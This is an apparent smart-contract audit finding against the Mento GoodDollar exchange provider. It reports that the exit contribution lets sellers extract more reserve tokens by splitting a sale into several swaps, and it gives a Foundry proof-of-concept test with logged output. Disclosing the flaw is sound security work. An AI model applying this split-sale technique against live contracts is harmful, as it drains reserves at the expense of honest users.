ZeroTrust - A malicious user can obtain more reserve tokens by selling GoodDollar multiple times rather than selling it all at once.

[sherlock-admin2]

ZeroTrust

High

A malicious user can obtain more reserve tokens by selling GoodDollar multiple times rather than selling it all at once.

Summary

A malicious user can obtain more reserve tokens by selling GoodDollar multiple times rather than selling it all at once.

Root Cause

https://github.com/sherlock-audit/2024-10-mento-update/blob/098b17fb32d294145a7f000d96917d13db8756cc/mento-core/contracts/goodDollar/BancorExchangeProvider.sol#L324

 function _getScaledAmountOut(
    PoolExchange memory exchange,
    address tokenIn,
    address tokenOut,
    uint256 scaledAmountIn
  ) internal view verifyExchangeTokens(tokenIn, tokenOut, exchange) returns (uint256 scaledAmountOut) {
    if (tokenIn == exchange.reserveAsset) {
      scaledAmountOut = purchaseTargetAmount(
        exchange.tokenSupply,
        exchange.reserveBalance,
        exchange.reserveRatio,
        scaledAmountIn
      );
    } else {
      scaledAmountOut = saleTargetAmount(
        exchange.tokenSupply,
        exchange.reserveBalance,
        exchange.reserveRatio,
        scaledAmountIn
      );
      // apply exit contribution
@>>      scaledAmountOut = (scaledAmountOut * (MAX_WEIGHT - exchange.exitContribution)) / MAX_WEIGHT;
    }
  }

Due to the effect of exitContribution, the price curve becomes discontinuous, allowing malicious users to exploit this.

Internal pre-conditions

No response

External pre-conditions

No response

Attack Path

Split the GoodDollar to be sold into multiple sales.

Impact

Malicious users can obtain more reserve tokens, causing honest users to incur losses.

PoC

contract GoodDollarExchangeProviderTest_compareSellTwoTime is GoodDollarExchangeProviderTest {
  GoodDollarExchangeProvider exchangeProvider;
  bytes32 exchangeId;
  uint256 reserveInterest;

  function setUp() public override {
    super.setUp();
    poolExchange = IBancorExchangeProvider.PoolExchange({
      reserveAsset: address(reserveToken),
      tokenAddress: address(token),
      tokenSupply: 7_00_000 * 1e18,
      reserveBalance: 200_000 * 1e18,
      reserveRatio: 1e8 * 0.28571428,
      exitContribution: 1e8 * 0.1
    });
    exchangeProvider = initializeGoodDollarExchangeProvider();
    vm.prank(avatarAddress);
    exchangeId = exchangeProvider.createExchange(poolExchange);
  }

function test_compare_sell_two_times_swapIn() public {
  
    uint256 amountIn = 10000*1e18; //

    uint256 amountOut_one = exchangeProvider.getAmountOut(exchangeId,address(token), address(reserveToken),  amountIn*2 );
    

    vm.prank(brokerAddress);
    uint256 out_first = exchangeProvider.swapIn(exchangeId,address(token),address(reserveToken),  amountIn );
    vm.prank(brokerAddress);
    uint256 out_second = exchangeProvider.swapIn(exchangeId, address(token),address(reserveToken), amountIn );

    assertGt(out_first+out_second, amountOut_one);

    console2.log("amountout one time is", amountOut_one);
    console2.log("amountout two time is", out_first+out_second);
    
  }
}

Add above code in file test/unit/goodDollar/GoodDollarExchangeProvider.t.sol, then run forge test --mt test_compare_sell_two_times_swapIn -vv
then will get:

Ran 1 test for test/unit/goodDollar/GoodDollarExchangeProvider.t.sol:GoodDollarExchangeProviderTest_compareSellTwoTime
[PASS] test_compare_sell_two_times_swapIn() (gas: 166768)
Logs:
  amountout one time is 17366293967395736536203
  amountout two time is 17410330245249691351610

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.16ms (714.04µs CPU time)

It can be seen that selling in two transactions yields more reserve tokens. If split into even more transactions, even more reserve tokens can be obtained.

Mitigation

The penalty fees are stored separately to be allocated to UBI receivers.